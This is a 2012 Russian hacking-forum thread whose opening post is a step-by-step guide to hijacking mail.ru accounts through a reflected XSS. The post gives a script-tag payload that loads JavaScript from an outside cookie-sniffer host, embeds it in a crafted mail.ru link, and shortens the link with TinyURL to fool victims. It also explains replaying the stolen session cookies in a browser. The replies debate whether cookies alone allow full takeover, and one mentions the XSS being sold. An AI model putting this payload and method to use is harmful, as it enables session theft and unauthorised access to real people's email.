Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Взлом мыла с помощью пассивной xss (https://forum.antichat.xyz/showthread.php?t=316575)

tickhack 01.02.2012 15:22

Привет всем я хотел рассказать как можна угнать куки на mail.ru с помощью пассивной xss.

1.Нам понадобиться Пассивка

2.Сниффер я буду использовать сниффер https://hacker-pro.net/sniffer/

3.Мозги и руки !

Так заходим на сниффер и берём Код для пассивной XSS атаки вот он

Код:

%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"
мы теперь должи прекрепить его к пассивной xss после знака "> и у нас получется вот так

Код:

http://mail.ru/###********=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"
Если жертва перейдёт по этой ссылке то куки придут на наш сниффер.

Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/

заходим на этот сайт и где написано

Код:

Enter a long URL to make tiny:
вбиваем туда нашу ядовитую ссылку и нажимаем на кнопочку

Код:

make a TinyURL
И у нас появится ссылка http://tinyurl.com/823p5w9 ну увас может быть чучуть другая ну это не важно кидаем эту ссылку жертве и если она перейдёт по этой ссылке то её куки будут у нас.

Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.

Внимание если жертва перейдёт по ссылки и выйдет из своего мыла то куки автоматически умерают.

ну чтож думаю всё !

не забываем про "+"

Автор : Tickhack

M_script 01.02.2012 15:54

tickhack, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?

Цитата:

Сообщение от tickhack
Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.

После этого что делать?

martmm 01.02.2012 16:37

M_script после этого ты попадаешь в мыло жертвы если куки еще действительны будут!)))

tickhack 01.02.2012 16:39

Цитата:

Сообщение от M_script
tickhack
, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?
После этого что делать?

после этого заходишь на майл.ру и попадаешь на мыло жертвы

только не забудь заменить куки жертвы на свои в опере

kravch_v 01.02.2012 17:15

Цитата:

Сообщение от tickhack
после этого заходишь на майл.ру и попадаешь на мыло жертвы
только не забудь заменить куки жертвы на свои в опере

Хе-хе. Тут в паблик выложил пассивную XSS, в другой теме продавал ее минут 30 назад за 25$. Мужик)

tickhack 01.02.2012 17:31

Цитата:

Сообщение от kravch_v
Хе-хе. Тут в паблик выложил пассивную XSS, в другой теме продавал ее минут 30 назад за 25$. Мужик)

Не жалко у меня их много

tickhack 01.02.2012 17:34

Цитата:

Сообщение от kravch_v
Хе-хе. Тут в паблик выложил пассивную XSS, в другой теме продавал ее минут 30 назад за 25$. Мужик)

уже нету пассивки

Unknown 01.02.2012 17:35

Цитата:

Сообщение от M_script
tickhack
, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?
После этого что делать?


Потроллить решил?

M_script 01.02.2012 18:12

martmm, tickhack, вы неправильно поняли вопрос.

Взлом подразумевает получение полного контроля над ящиком. Как изменить пароль или данные для его восстановления, имея только куки юзера?

Ereee 01.02.2012 18:21

Цитата:

Сообщение от M_script
martmm
,
tickhack
, вы не правильно поняли вопрос.
Взлом подразумевает получение полного контроля над ящиком. Как изменить пароль или данные для его восстановления, имея только куки юзера?

Ну если я не отстал от жизни, то думаю никак. Разве мегабаг найдут. Видел пару тем, в которых предлагают купить:

Цитата:

Сообщение от None
Смена пароля в сессии

Как это делают, хз.


Время: 09:07